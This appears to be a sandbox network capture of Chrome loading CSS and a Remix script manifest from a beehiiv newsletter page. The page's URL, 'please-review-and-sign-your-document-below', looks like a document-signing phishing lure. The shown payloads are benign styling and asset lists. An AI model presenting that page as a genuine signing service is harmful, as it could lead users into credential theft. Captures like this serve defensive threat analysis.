                                                                                                                                            2025-01-15 18:14:31 UTC1369INData Raw: 2d 63 6f 6c 6f 72 29 3b 20 7d 0a 2e 62 6f 72 64 65 72 2d 77 74 2d 74 65 78 74 2d 6f 6e 2d 70 72 69 6d 61 72 79 20 7b 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 74 2d 74 65 78 74 2d 6f 6e 2d 70 72 69 6d 61 72 79 2d 63 6f 6c 6f 72 29 3b 20 7d 0a 0a 2e 62 67 2d 77 74 2d 73 65 63 6f 6e 64 61 72 79 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 74 2d 73 65 63 6f 6e 64 61 72 79 2d 63 6f 6c 6f 72 29 3b 20 7d 0a 2e 74 65 78 74 2d 77 74 2d 73 65 63 6f 6e 64 61 72 79 20 7b 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 74 2d 73 65 63 6f 6e 64 61 72 79 2d 63 6f 6c 6f 72 29 3b 20 7d 0a 2e 62 6f 72 64 65 72 2d 77 74 2d 73 65 63 6f 6e 64 61 72 79 20 7b 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d
                                                                                                                                            Data Ascii: -color); }.border-wt-text-on-primary { border-color: var(--wt-text-on-primary-color); }.bg-wt-secondary { background-color: var(--wt-secondary-color); }.text-wt-secondary { color: var(--wt-secondary-color); }.border-wt-secondary { border-color: var(-
                                                                                                                                            2025-01-15 18:14:31 UTC1369INData Raw: 3b 20 7d 0a 0a 2e 62 67 2d 77 74 2d 73 75 62 73 63 72 69 62 65 2d 62 61 63 6b 67 72 6f 75 6e 64 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 74 2d 73 75 62 73 63 72 69 62 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 29 3b 20 7d 0a 2e 74 65 78 74 2d 77 74 2d 73 75 62 73 63 72 69 62 65 2d 62 61 63 6b 67 72 6f 75 6e 64 20 7b 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 74 2d 73 75 62 73 63 72 69 62 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 29 3b 20 7d 0a 2e 62 6f 72 64 65 72 2d 77 74 2d 73 75 62 73 63 72 69 62 65 2d 62 61 63 6b 67 72 6f 75 6e 64 20 7b 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 74 2d 73 75 62 73 63 72 69 62 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                                                                                                            Data Ascii: ; }.bg-wt-subscribe-background { background-color: var(--wt-subscribe-background-color); }.text-wt-subscribe-background { color: var(--wt-subscribe-background-color); }.border-wt-subscribe-background { border-color: var(--wt-subscribe-background-color


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            1192.168.2.1649708104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:31 UTC843OUTGET /assets/manifest-bfc7ba9e.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:32 UTC914INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:32 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 45064
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"b008-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4159
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d891eddd42e4-EWR
                                                                                                                                            2025-01-15 18:14:32 UTC455INData Raw: 77 69 6e 64 6f 77 2e 5f 5f 72 65 6d 69 78 4d 61 6e 69 66 65 73 74 3d 7b 22 65 6e 74 72 79 22 3a 7b 22 6d 6f 64 75 6c 65 22 3a 22 2f 61 73 73 65 74 73 2f 65 6e 74 72 79 2e 63 6c 69 65 6e 74 2d 43 75 42 73 6e 6b 2d 31 2e 6a 73 22 2c 22 69 6d 70 6f 72 74 73 22 3a 5b 22 2f 61 73 73 65 74 73 2f 69 6e 64 65 78 2d 44 36 64 61 39 70 36 2d 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 6a 73 78 2d 72 75 6e 74 69 6d 65 2d 42 6a 47 5f 7a 56 31 57 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 41 70 70 47 6c 6f 62 61 6c 73 2d 32 42 72 2d 38 62 5a 73 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 64 61 79 6a 73 2e 6d 69 6e 2d 42 38 43 66 67 41 68 55 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2d 64 66 55 5f 5a 4b 61 57 2e 6a 73 22 2c 22 2f 61 73 73 65
                                                                                                                                            Data Ascii: window.__remixManifest={"entry":{"module":"/assets/entry.client-CuBsnk-1.js","imports":["/assets/index-D6da9p6-.js","/assets/jsx-runtime-BjG_zV1W.js","/assets/AppGlobals-2Br-8bZs.js","/assets/dayjs.min-B8CfgAhU.js","/assets/performance-dfU_ZKaW.js","/asse
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 73 43 6c 69 65 6e 74 4c 6f 61 64 65 72 22 3a 66 61 6c 73 65 2c 22 68 61 73 45 72 72 6f 72 42 6f 75 6e 64 61 72 79 22 3a 74 72 75 65 2c 22 6d 6f 64 75 6c 65 22 3a 22 2f 61 73 73 65 74 73 2f 72 6f 6f 74 2d 43 35 4d 6e 5f 75 48 2d 2e 6a 73 22 2c 22 69 6d 70 6f 72 74 73 22 3a 5b 22 2f 61 73 73 65 74 73 2f 69 6e 64 65 78 2d 44 36 64 61 39 70 36 2d 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 6a 73 78 2d 72 75 6e 74 69 6d 65 2d 42 6a 47 5f 7a 56 31 57 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 41 70 70 47 6c 6f 62 61 6c 73 2d 32 42 72 2d 38 62 5a 73 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 64 61 79 6a 73 2e 6d 69 6e 2d 42 38 43 66 67 41 68 55 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2d 64 66 55 5f 5a 4b 61 57 2e 6a 73 22 2c 22 2f
                                                                                                                                            Data Ascii: sClientLoader":false,"hasErrorBoundary":true,"module":"/assets/root-C5Mn_uH-.js","imports":["/assets/index-D6da9p6-.js","/assets/jsx-runtime-BjG_zV1W.js","/assets/AppGlobals-2Br-8bZs.js","/assets/dayjs.min-B8CfgAhU.js","/assets/performance-dfU_ZKaW.js","/
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 2f 43 72 65 61 74 65 41 63 74 69 6f 6e 2d 44 6c 30 4a 6a 43 4f 52 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 70 6f 70 6f 76 65 72 2d 43 56 31 4a 2d 46 46 70 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 69 6e 64 65 78 2d 44 49 55 2d 48 72 73 31 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 75 73 65 53 65 74 4c 61 73 74 56 69 65 77 65 64 52 65 73 6f 75 72 63 65 2d 42 65 6c 52 6f 4b 69 36 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 69 6e 64 65 78 2d 44 63 70 4e 6b 2d 4f 49 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 43 68 65 76 72 6f 6e 44 6f 77 6e 49 63 6f 6e 2d 43 43 79 77 70 54 33 6d 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 58 4d 61 72 6b 49 63 6f 6e 2d 59 32 74 4f 33 59 6b 67 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 69 6e 64 65 78 2d 70 6e 46 78 4f 61 61 63 2e 6a
                                                                                                                                            Data Ascii: /CreateAction-Dl0JjCOR.js","/assets/popover-CV1J-FFp.js","/assets/index-DIU-Hrs1.js","/assets/useSetLastViewedResource-BelRoKi6.js","/assets/index-DcpNk-OI.js","/assets/ChevronDownIcon-CCywpT3m.js","/assets/XMarkIcon-Y2tO3Ykg.js","/assets/index-pnFxOaac.j
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 65 74 73 2f 75 70 64 61 74 65 5f 73 75 62 73 63 72 69 62 65 72 5f 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 5f 73 75 62 73 63 72 69 70 74 69 6f 6e 2d 6c 30 73 4e 52 4e 4b 5a 2e 6a 73 22 2c 22 69 6d 70 6f 72 74 73 22 3a 5b 5d 2c 22 63 73 73 22 3a 5b 5d 7d 2c 22 72 6f 75 74 65 73 2f 5f 5f 61 63 74 69 6f 6e 73 2f 75 70 64 61 74 65 5f 73 75 62 73 63 72 69 62 65 72 5f 70 72 65 66 65 72 65 6e 63 65 22 3a 7b 22 69 64 22 3a 22 72 6f 75 74 65 73 2f 5f 5f 61 63 74 69 6f 6e 73 2f 75 70 64 61 74 65 5f 73 75 62 73 63 72 69 62 65 72 5f 70 72 65 66 65 72 65 6e 63 65 22 2c 22 70 61 72 65 6e 74 49 64 22 3a 22 72 6f 6f 74 22 2c 22 70 61 74 68 22 3a 22 75 70 64 61 74 65 5f 73 75 62 73 63 72 69 62 65 72 5f 70 72 65 66 65 72 65 6e 63 65 22 2c 22 68 61 73 41 63 74 69 6f 6e 22 3a 74
                                                                                                                                            Data Ascii: ets/update_subscriber_organization_subscription-l0sNRNKZ.js","imports":[],"css":[]},"routes/__actions/update_subscriber_preference":{"id":"routes/__actions/update_subscriber_preference","parentId":"root","path":"update_subscriber_preference","hasAction":t
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 6f 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 73 2d 44 6d 79 57 46 77 75 6f 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 64 65 73 63 72 69 70 74 69 6f 6e 2d 42 6b 6c 4f 58 62 46 2d 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 69 6e 64 65 78 2d 43 71 4a 4e 38 69 51 71 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 46 6f 72 6d 53 75 62 6d 69 73 73 69 6f 6e 4d 65 73 73 61 67 65 2d 53 79 68 52 43 69 48 57 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 64 69 61 6c 6f 67 2d 43 74 70 48 76 76 66 44 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 75 73 65 54 6f 61 73 74 2d 44 4b 34 32 75 46 30 37 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 69 6e 64 65 78 2d 44 6a 38 44 34 34 31 69 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 69 6e 64 65 78 2d 44 54 74 75 49 6a 7a 2d 2e 6a 73 22 2c 22 2f 61 73 73
                                                                                                                                            Data Ascii: oot-containers-DmyWFwuo.js","/assets/description-BklOXbF-.js","/assets/index-CqJN8iQq.js","/assets/FormSubmissionMessage-SyhRCiHW.js","/assets/dialog-CtpHvvfD.js","/assets/useToast-DK42uF07.js","/assets/index-Dj8D441i.js","/assets/index-DTtuIjz-.js","/ass
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 6e 64 65 78 2d 42 46 44 6f 69 76 6a 42 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 69 6e 64 65 78 2d 42 62 6e 54 7a 65 4c 66 2e 6a 73 22 5d 2c 22 63 73 73 22 3a 5b 5d 7d 2c 22 72 6f 75 74 65 73 2f 5f 5f 6c 6f 61 64 65 72 73 2f 70 61 67 69 6e 61 74 65 64 5f 61 75 74 68 6f 72 5f 70 6f 73 74 73 22 3a 7b 22 69 64 22 3a 22 72 6f 75 74 65 73 2f 5f 5f 6c 6f 61 64 65 72 73 2f 70 61 67 69 6e 61 74 65 64 5f 61 75 74 68 6f 72 5f 70 6f 73 74 73 22 2c 22 70 61 72 65 6e 74 49 64 22 3a 22 72 6f 6f 74 22 2c 22 70 61 74 68 22 3a 22 70 61 67 69 6e 61 74 65 64 5f 61 75 74 68 6f 72 5f 70 6f 73 74 73 22 2c 22 68 61 73 41 63 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 68 61 73 4c 6f 61 64 65 72 22 3a 74 72 75 65 2c 22 68 61 73 43 6c 69 65 6e 74 41 63 74 69 6f 6e 22 3a 66 61 6c 73 65
                                                                                                                                            Data Ascii: ndex-BFDoivjB.js","/assets/index-BbnTzeLf.js"],"css":[]},"routes/__loaders/paginated_author_posts":{"id":"routes/__loaders/paginated_author_posts","parentId":"root","path":"paginated_author_posts","hasAction":false,"hasLoader":true,"hasClientAction":false
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 6e 74 73 2d 4f 6a 32 78 4d 66 47 45 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 6a 73 78 2d 72 75 6e 74 69 6d 65 2d 42 6a 47 5f 7a 56 31 57 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 69 6e 64 65 78 2d 78 32 64 61 5f 7a 63 76 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 63 6f 6e 74 65 78 74 2d 43 78 66 4f 73 5f 39 4c 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 6b 65 79 62 6f 61 72 64 2d 43 61 45 75 32 6f 30 75 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 75 73 65 2d 69 73 2d 6d 6f 75 6e 74 65 64 2d 42 61 48 76 31 36 62 42 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 62 75 67 73 2d 44 56 51 7a 42 68 2d 73 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 75 73 65 54 72 61 6e 73 6c 61 74 69 6f 6e 2d 43 66 4b 4a 41 6d 47 59 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 74 72 61 6e 73
                                                                                                                                            Data Ascii: nts-Oj2xMfGE.js","/assets/jsx-runtime-BjG_zV1W.js","/assets/index-x2da_zcv.js","/assets/context-CxfOs_9L.js","/assets/keyboard-CaEu2o0u.js","/assets/use-is-mounted-BaHv16bB.js","/assets/bugs-DVQzBh-s.js","/assets/useTranslation-CfKJAmGY.js","/assets/trans
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 73 4c 6f 61 64 65 72 22 3a 74 72 75 65 2c 22 68 61 73 43 6c 69 65 6e 74 41 63 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 68 61 73 43 6c 69 65 6e 74 4c 6f 61 64 65 72 22 3a 66 61 6c 73 65 2c 22 68 61 73 45 72 72 6f 72 42 6f 75 6e 64 61 72 79 22 3a 66 61 6c 73 65 2c 22 6d 6f 64 75 6c 65 22 3a 22 2f 61 73 73 65 74 73 2f 6d 61 6e 61 67 65 2d 42 43 75 55 5f 31 54 57 2e 6a 73 22 2c 22 69 6d 70 6f 72 74 73 22 3a 5b 22 2f 61 73 73 65 74 73 2f 69 6e 64 65 78 2d 44 36 64 61 39 70 36 2d 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2d 4f 6a 32 78 4d 66 47 45 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 63 6f 6e 74 65 78 74 2d 43 78 66 4f 73 5f 39 4c 2e 6a 73 22 2c 22 2f 61 73 73 65 74 73 2f 6b 65 79 62 6f 61 72 64 2d 43 61 45 75 32 6f 30 75 2e 6a
                                                                                                                                            Data Ascii: sLoader":true,"hasClientAction":false,"hasClientLoader":false,"hasErrorBoundary":false,"module":"/assets/manage-BCuU_1TW.js","imports":["/assets/index-D6da9p6-.js","/assets/components-Oj2xMfGE.js","/assets/context-CxfOs_9L.js","/assets/keyboard-CaEu2o0u.j
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 6f 6e 22 3a 74 72 75 65 2c 22 68 61 73 4c 6f 61 64 65 72 22 3a 74 72 75 65 2c 22 68 61 73 43 6c 69 65 6e 74 41 63 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 68 61 73 43 6c 69 65 6e 74 4c 6f 61 64 65 72 22 3a 66 61 6c 73 65 2c 22 68 61 73 45 72 72 6f 72 42 6f 75 6e 64 61 72 79 22 3a 66 61 6c 73 65 2c 22 6d 6f 64 75 6c 65 22 3a 22 2f 61 73 73 65 74 73 2f 63 6f 6d 6d 65 6e 74 5f 6c 69 6b 65 2d 43 42 77 31 61 58 65 45 2e 6a 73 22 2c 22 69 6d 70 6f 72 74 73 22 3a 5b 22 2f 61 73 73 65 74 73 2f 6a 73 78 2d 72 75 6e 74 69 6d 65 2d 42 6a 47 5f 7a 56 31 57 2e 6a 73 22 5d 2c 22 63 73 73 22 3a 5b 5d 7d 2c 22 72 6f 75 74 65 73 2f 5f 5f 61 63 74 69 6f 6e 73 2f 70 6f 73 74 5f 73 75 62 73 63 72 69 62 65 5f 66 6f 72 6d 22 3a 7b 22 69 64 22 3a 22 72 6f 75 74 65 73 2f 5f 5f 61
                                                                                                                                            Data Ascii: on":true,"hasLoader":true,"hasClientAction":false,"hasClientLoader":false,"hasErrorBoundary":false,"module":"/assets/comment_like-CBw1aXeE.js","imports":["/assets/jsx-runtime-BjG_zV1W.js"],"css":[]},"routes/__actions/post_subscribe_form":{"id":"routes/__a
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 6c 65 22 3a 22 2f 61 73 73 65 74 73 2f 65 78 74 65 6e 64 65 64 5f 66 65 65 64 62 61 63 6b 2d 6c 30 73 4e 52 4e 4b 5a 2e 6a 73 22 2c 22 69 6d 70 6f 72 74 73 22 3a 5b 5d 2c 22 63 73 73 22 3a 5b 5d 7d 2c 22 72 6f 75 74 65 73 2f 5f 5f 6c 6f 61 64 65 72 73 2f 72 65 63 6f 6d 6d 65 6e 64 65 64 5f 70 6f 73 74 73 22 3a 7b 22 69 64 22 3a 22 72 6f 75 74 65 73 2f 5f 5f 6c 6f 61 64 65 72 73 2f 72 65 63 6f 6d 6d 65 6e 64 65 64 5f 70 6f 73 74 73 22 2c 22 70 61 72 65 6e 74 49 64 22 3a 22 72 6f 6f 74 22 2c 22 70 61 74 68 22 3a 22 72 65 63 6f 6d 6d 65 6e 64 65 64 5f 70 6f 73 74 73 22 2c 22 68 61 73 41 63 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 68 61 73 4c 6f 61 64 65 72 22 3a 74 72 75 65 2c 22 68 61 73 43 6c 69 65 6e 74 41 63 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 68 61 73
                                                                                                                                            Data Ascii: le":"/assets/extended_feedback-l0sNRNKZ.js","imports":[],"css":[]},"routes/__loaders/recommended_posts":{"id":"routes/__loaders/recommended_posts","parentId":"root","path":"recommended_posts","hasAction":false,"hasLoader":true,"hasClientAction":false,"has


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            2192.168.2.1649710104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:32 UTC804OUTGET /assets/root-DEVPAlsu.css HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:32 UTC902INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:32 GMT
                                                                                                                                            Content-Type: text/css; charset=UTF-8
                                                                                                                                            Content-Length: 140565
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:28:55 GMT
                                                                                                                                            Etag: W/"22515-193f97ffd58"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4159
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8950e2fc35b-EWR
                                                                                                                                            2025-01-15 18:14:32 UTC467INData Raw: 2a 2c 3a 62 65 66 6f 72 65 2c 3a 61 66 74 65 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 65 35 65 37 65 62 7d 3a 62 65 66 6f 72 65 2c 3a 61 66 74 65 72 7b 2d 2d 74 77 2d 63 6f 6e 74 65 6e 74 3a 20 22 22 7d 68 74 6d 6c 2c 3a 68 6f 73 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 6d 6f 7a 2d 74 61 62 2d 73 69 7a 65 3a 34 3b 2d 6f 2d 74 61 62 2d 73 69 7a 65 3a 34 3b 74 61 62 2d 73 69 7a 65 3a 34 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 75 69 2d 73 61 6e 73 2d 73 65 72 69 66 2c 73 79 73 74 65
                                                                                                                                            Data Ascii: *,:before,:after{box-sizing:border-box;border-width:0;border-style:solid;border-color:#e5e7eb}:before,:after{--tw-content: ""}html,:host{line-height:1.5;-webkit-text-size-adjust:100%;-moz-tab-size:4;-o-tab-size:4;tab-size:4;font-family:ui-sans-serif,syste
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 74 3a 69 6e 68 65 72 69 74 7d 68 72 7b 68 65 69 67 68 74 3a 30 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 31 70 78 7d 61 62 62 72 3a 77 68 65 72 65 28 5b 74 69 74 6c 65 5d 29 7b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 7d 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 7b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 61 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 69 6e 68 65 72 69 74 7d 62 2c 73 74 72 6f 6e 67
                                                                                                                                            Data Ascii: t:inherit}hr{height:0;color:inherit;border-top-width:1px}abbr:where([title]){-webkit-text-decoration:underline dotted;text-decoration:underline dotted}h1,h2,h3,h4,h5,h6{font-size:inherit;font-weight:inherit}a{color:inherit;text-decoration:inherit}b,strong
                                                                                                                                            2025-01-15 18:14:32 UTC1369INData Raw: 7d 3a 3a 2d 77 65 62 6b 69 74 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 62 75 74 74 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 62 75 74 74 6f 6e 3b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 7d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 7d 62 6c 6f 63 6b 71 75 6f 74 65 2c 64 6c 2c 64 64 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 68 72 2c 66 69 67 75 72 65 2c 70 2c 70 72 65 7b 6d 61 72 67 69 6e 3a 30 7d 66 69 65 6c 64 73 65 74 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 6c 65 67 65 6e 64 7b 70 61 64 64 69 6e 67 3a 30 7d 6f 6c 2c 75 6c 2c 6d 65 6e 75 7b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 64 69 61 6c 6f 67 7b 70 61
                                                                                                                                            Data Ascii: }::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}summary{display:list-item}blockquote,dl,dd,h1,h2,h3,h4,h5,h6,hr,figure,p,pre{margin:0}fieldset{margin:0;padding:0}legend{padding:0}ol,ul,menu{list-style:none;margin:0;padding:0}dialog{pa
